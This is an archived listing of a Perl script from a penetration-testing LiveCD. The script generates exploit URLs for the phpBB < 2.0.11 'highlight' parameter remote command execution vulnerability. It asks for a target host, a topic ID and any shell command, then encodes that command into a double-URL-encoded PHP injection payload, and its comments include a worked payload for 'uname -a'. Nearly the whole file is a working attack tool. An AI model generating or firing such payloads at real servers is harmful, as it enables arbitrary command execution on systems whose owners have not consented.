home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / phpbb-url.pl < prev    next >
Perl Script  |  2005-02-12  |  2KB  |  38 lines
  1. #!/usr/bin/perl -w
  2. # Code that automate the creation of the URL to exploit phpBB < 2.0.11
  3. # Discovered by Zeelock and descibed at http://www.securityfocus.com/bid/10701
  4. # and http://www.packetstormsecurity.org/0411-exploits/phpbb2011.txt
  5. # Fix: http://www.securityfocus.com/bid/10701/solution/
  6. #
  7. # Example of execution:
  8. #
  9. # Insert the hostname of the target, with, if necessary,
  10. # the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): http://www.hostname.com/phpbb/
  11. # Insert a valid topic number (viewtopic.php?t=[topic_number]): 542
  12. # Insert the command to execute on the target: uname -a
  13. # This is the final URL: http://www.hostname.com/phpbb/viewtopic.php?t=542&highlight=%2527%252esystem(chr(117)
  14. # %252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527
  15. #
  16. # by albythebest - http://albythebest.altervista.org/
  17.  
  18. print "#########################################################\n";
  19. print "# phpBB < 2.0.11 Vulnerability URL Creator - BID: 10701 #\n";
  20. print "#########################################################\n";
  21. print "           http://albythebest.altervista.org/\n\n";
  22. print "Insert the hostname of the target, with, if necessary,
  23. the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): ";
  24. $host=<stdin>;
  25. chomp $host;
  26. print "Insert a valid topic number (viewtopic.php?t=[topic_number]): ";
  27. $topic=<stdin>;
  28. chomp $topic;
  29. print "Insert the command to execute on the target: ";
  30. $comando=<stdin>;
  31. chomp $comando;
  32. @command=split(//,$comando);
  33. print "This is the final URL: ",$host,"viewtopic.php?t=",$topic,"&highlight=%2527%252esystem(chr(";
  34. print ord("$command[0]");
  35. for($indice=1;$indice<@command;$indice++) {
  36.   print ")%252echr(",ord("$command[$indice]");
  37. }
  38. print "))%252e%2527\n";